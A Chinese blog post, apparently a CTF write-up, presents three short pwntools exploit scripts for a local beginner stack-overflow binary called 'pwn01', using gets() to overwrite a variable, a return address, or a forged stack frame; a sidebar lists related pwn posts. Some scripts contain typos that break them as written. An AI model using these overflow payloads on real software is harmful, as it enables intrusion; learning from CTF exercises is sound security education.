2019.7.21 pwn01 栈溢出的3种思路

最新推荐文章于 2024-02-01 10:37:29 发布
最新推荐文章于 2024-02-01 10:37:29 发布
阅读量284 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DSR446/article/details/98165720
版权

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这是一道简单的栈溢出的问题。下面简绍3种解法。
①我们在IDA中查看s和a之间的距离,直接在利用gets函数的不安全性进行栈溢出覆盖a的值。这里要注意的是要加8而不是4,也就是变量所在的位置也要算。
exp为:

from pwn import *
sh=process("./pwn01)
payload="a"*(0x2c+8)+p32(0xCAFFBABE)
sh.sendline(payload)
sh.interactive()

②我们可以直接在填充完s和ebp以后,将返回地址设为下面那条拿到flag的语句。
exp:

from pwn import *
sh=process("./pwn01")
payload="a"*2c+p32(0x80485E0)
sh.sendline(payload)
sh.interactive()

③想让程序执行满足if语句中的指令,则需要满足一定的条件。也就是当func函数的参数满足一定的条件。那么我们可以构造一个伪栈帧,让程序再执行一次func,并将其参数设置为满足条件的数。
exp:

    from pwn import *
    sh=process("./pwn01")
    payload="a"*(0x28)+"a"*4+p32(0x8048590)+"a"*4+p32(0xcafebabe)
    sh.sendline(payload)
    sh

.interactive()
藏蓝色的达达
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN入门01[攻防世界]
qq_43746493的博客
03-06 384
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 环境:Kali+IDA Freeware7.6(之前在Ubuntu20上安装IDA6.4,F5无法查看伪代码) 参考博文: https://blog.csdn.net/qq_39596232/article/details/100036147
pwn 01
最新发布
2301_79970561的博客
02-01 1008
我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这问题是一特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。ROP(Return Oriented Programming),即返回导向编程,通过栈溢出内容覆盖返回地址,使其跳转到可执行文件中已有的片段代码中执行我们选择的代码段。
[BUUCTF-pwn] whitehat2018_pwn01
weixin_52640415的博客
12-30 383
又是一个代码巨长的程序,前十页没有有用的东西 程序开了PIE但是直接给了地址,== no PIE 在sub_1178发现fgets(s, 230, stdin); 这里s定义是rbp-d0 可以溢出到reb 也就是可以在这移栈 int sub_1178() { void *v0; // rax char s[112]; // [rsp+0h] [rbp-D0h] BYREF char nptr[16]; // [rsp+70h] [rbp-60h] BYREF char s1[32]
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
PWN接口是指PWM(Pulse Width Modulation)的误拼写,实际上,这里的"PWN"可能是指一特定的或者非标准的PWM接口实现。PWM的核心思想是通过改变脉冲宽度来模拟不同的电压等级,而无需改变实际的电压值。在嵌入式...
pwm.zip_PIC_PWN
09-14
标题"PWM.zip_PIC_PWN"暗示了这是一个与微控制器Pic相关的项目,主要涉及的是脉宽调制(PWM)技术的汇编语言源代码。在嵌入式系统中,PIC微控制器是广泛应用的一微处理器,尤其在控制和信号处理任务中。而PWM是一...
pwn题目中的libc-2.27.so文件
04-11
做pwn题,有些时候题目不给这个文件,这里是这个库的文件。
栈溢出 (1).pdf
09-30
栈溢出是计算机安全领域中的一常见的漏洞,它发生在程序尝试向栈上的变量写入比分配给该变量的字节还要多的数据时。这漏洞允许攻击者控制程序的执行流程,进而可能获取系统的控制权。Pwn是黑客的俚语,通常用于...
[pwn] 1.二进制基础
H4ppyD0g的博客
09-01 270
文章目录C语言源代码到可执行文件生成过程可执行文件分类ELF文件格式静态链接和动态链接程序执行过程函数调用栈规则 C语言源代码到可执行文件生成过程 编译:C源代码-》汇编代码 汇编:汇编代码-》机器码 链接:多个目标机器码-》一个可执行文件 可执行文件分类 windows:PE 可执行程序.exe 动态链接库.dll 静态链接库.lib linux:ELF 可执行文件.out 动态链接库.so 静态链接库.a ELF文件格式 ELF文件头表(ELF header) 程序头表(Program header
一些关于Pwn的学习链接
Pwnpanda的博客
07-31 2392
暑假学习计划 - 0x01 最近整理一些有关Pwn的学习链接,同时也要感谢@某位小仙女的整理 以后应该还会继续更新一些 0x00 Pwn整体学习路线&&相关知识点 https://ctf-wiki.github.io/ctf-wiki/ 0x01 一步一步学ROP之linux_x86篇 – 蒸米 http://www.vuln.cn/6645 0x02 一步一步学ROP之...
Linux pwn入门教程(0)——环境配置
dfdhxb995397的博客
07-02 939
作者:Tangerine@SAINTSEC 0×00前言 作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的p...
linux pwn练习0x01
yusakul的博客
11-19 455
pwn练习的记录
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1579
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
pwn入门
九层台
03-27 1万+
之前学过一点关于pwn,不过总是断断续续,学一点就停止了,这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去 查看fd.c文件 main函数中:argc是命令行参数个数,char *argv[]是指所有命令行参数,char *envp[]是环境变量(argv[1]位置处存放的是命令行输入的第一个参数) atoi函数的作用是把字符转化为int型数据。 ...
linux_pwn0x01_fsb1
insomnia的博客
06-18 289
首先是源程序: #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { char a[1024]; while(1) { memset(a,'\0',1024); read(0,a,1024); printf(a); //the fsb vulnerabil...
pwn1
u014281987的博客
08-27 970
坑:记住是/bin/sh,不是bin/sh啊啊啊 这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用 from pwn import * io=
gets(s)存在的溢出漏洞问题
miaobeihai的博客
03-02 3195
scanf遇到输出不能有空格,所以用gets输入字符串,但是gets出现了一个潜在问题,gets将不停地往s中塞东西,不管s的可用空间是否足够,就存在溢出漏洞问题 解决方案可以用fgets代替, 不如说char s[100],buf[100]; fgets(buf,sizeof(s),stdin); while(fgets(buf,sizeof(buf),stdin)//循环输入
pwn+栈溢出解题思路
11-10
pwn是一利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值